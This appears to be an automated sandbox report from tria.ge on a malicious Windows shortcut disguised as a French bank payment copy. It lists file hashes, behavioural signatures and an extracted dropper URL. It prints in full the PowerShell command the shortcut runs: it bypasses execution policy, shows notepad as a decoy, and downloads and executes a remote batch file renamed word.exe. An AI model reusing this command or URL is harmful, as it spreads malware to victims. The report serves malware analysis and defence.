Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
20/02/2024, 07:07
Static task
static1
Behavioral task
behavioral1
Sample
Banque BEA_Copie de Paiement_txt.lnk
Resource
win7-20231215-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
Banque BEA_Copie de Paiement_txt.lnk
Resource
win10v2004-20231222-en
16 signatures
150 seconds
General
-
Target
Banque BEA_Copie de Paiement_txt.lnk
-
Size
2KB
-
MD5
32d11ce69ae0bae7375a6a9fcdf65238
-
SHA1
d7ee753812e1b9180d7df3df34df08f13c97ac7a
-
SHA256
8420bf1711e75f17cb07a83a66e038f9635968eeaa17c3540c966347bb1d373c
-
SHA512
3e4c138fdb052ea6a1bd313f0330ce7a0f7b4abff4eccbc612aaccf639ef5fa50491987e8e22817e028c465762547cd253cc1f0d32944f106b0f06ab703cc2a3
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://remisat.com.uy/bim/office.bat
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2856 powershell.exe 6 2856 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2856 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2856 2180 cmd.exe 29 PID 2180 wrote to memory of 2856 2180 cmd.exe 29 PID 2180 wrote to memory of 2856 2180 cmd.exe 29 PID 2856 wrote to memory of 2844 2856 powershell.exe 30 PID 2856 wrote to memory of 2844 2856 powershell.exe 30 PID 2856 wrote to memory of 2844 2856 powershell.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Banque BEA_Copie de Paiement_txt.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -noLogo -Command notepad.exe;(new-object System.Net.WebClient).DownloadFile('https://remisat.com.uy/bim/office.bat','word.exe');./word.exe;2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe"3⤵PID:2844
-
-